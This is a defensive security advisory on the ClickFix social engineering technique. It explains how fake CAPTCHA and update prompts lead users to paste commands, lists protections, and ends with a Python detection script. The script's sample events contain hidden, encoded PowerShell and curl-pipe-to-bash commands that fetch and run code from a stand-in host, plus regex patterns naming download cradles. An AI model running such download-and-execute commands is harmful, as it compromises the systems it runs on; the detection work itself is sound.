ClickFix Social Engineering: When the User Becomes the Attack Vector
- MAY 8TH, 2026
- 2 min read
ClickFix is a fast-growing social engineering technique in which threat actors trick users into copying and pasting malicious commands into the Windows Run dialogue, PowerShell, or a Terminal on macOS or Linux. Victims are shown fake CAPTCHA checks, browser verification prompts, update notices, or document errors that instruct them to "fix" the issue manually by running the command.
This method is highly effective because the user launches the command themselves, allowing attackers to bypass many traditional email filters, browser protections, and endpoint detections.
How it works
The attacker directs the victim to a malicious or compromised webpage through phishing emails, ads, or infected sites. The page shows a fake CAPTCHA, browser update, or document error while secretly copying a malicious command to the clipboard.
The victim is instructed to open the Run dialogue (Win + R) or PowerShell on Windows, or a Terminal on macOS or Linux, then paste and run the command.
Once run, the command can download malware, steal credentials, establish persistence, or give the attacker remote access to the system.
How to Protect Your Organisation
1. Block Suspicious Clipboard Access: Use browser policies to restrict or prompt for clipboard write access on untrusted websites.
2. Employee Awareness: Teach users to recognise fake CAPTCHA, browser update, and verification prompts. Legitimate websites should never ask users to open Run, PowerShell, or Terminal (on Windows or macOS) or execute pasted commands.
3. Restrict PowerShell (Windows) / Shell Execution (macOS/Linux): Enable Script Block Logging, enforce signed-script execution policies where applicable, and monitor for encoded or obfuscated commands. On macOS and Linux, monitor shell execution patterns and restrict unnecessary privilege escalation via sudo.
4. Endpoint Protection: Enable attack surface reduction rules and web protection to block obfuscated scripts, untrusted executables, and scripts launching downloaded malware.
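The monitoring called for in items 3 and 4, as an added detection example that is not part of this advisory: it triages constructed process-creation events (field names are assumptions) for a shell launched from the user's interactive session (a Win + R launch is a child of explorer.exe) combined with an encoded, hidden, policy-bypassing or download-and-execute command line, decoding -EncodedCommand payloads before matching.

```python
import base64
import re

# Constructed sample events (not real telemetry); field names mirror Sysmon Event ID 1 / EDR process logs (assumption).
SAMPLE_EVENTS = [
    {"host": "win-01", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -enc "
     + base64.b64encode("iwr http://example.invalid/p | iex".encode("utf-16-le")).decode()},
    {"host": "mac-02", "parent": "Terminal", "image": "bash",
     "cmdline": 'bash -c "curl -fsSL http://example.invalid/s | bash"'},
    {"host": "win-03", "parent": "services.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\Scripts\\Backup.ps1"},
]

# Win+R launches spawn from explorer.exe; a pasted Terminal command spawns from the terminal app.
USER_SESSION_PARENTS = {"explorer.exe", "terminal", "iterm2", "gnome-terminal"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "bash", "sh", "zsh"}
ENCODED = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
RULES = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "execution_policy_bypass": re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "download_cradle": re.compile(r"\b(?:iwr|invoke-webrequest|invoke-expression|"
                                  r"iex|downloadstring|mshta|curl|wget)\b", re.I),
    "pipe_to_shell": re.compile(r"\|\s*(?:bash|sh|zsh)\b", re.I),
}

def decode_encoded_command(cmdline):
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None if absent/malformed."""
    m = ENCODED.search(cmdline)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def triage(event):
    """Return (indicator names, decoded payload) for one process-creation event."""
    indicators = []
    if event["parent"].lower() in USER_SESSION_PARENTS and event["image"].lower() in SHELLS:
        indicators.append("shell_from_user_session")
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        indicators.append("encoded_command")
    text = event["cmdline"] + "\n" + (decoded or "")  # scan visible and decoded text together
    indicators += [name for name, rx in RULES.items() if rx.search(text)]
    return indicators, decoded

def is_clickfix_like(event):
    """User-launched shell plus at least one evasion or download indicator."""
    indicators, _ = triage(event)
    return "shell_from_user_session" in indicators and len(indicators) >= 2
```

The scheduled backup (win-03) is not flagged because it has neither a user-session parent nor any evasion indicator, which keeps routine signed-script automation out of the alert queue.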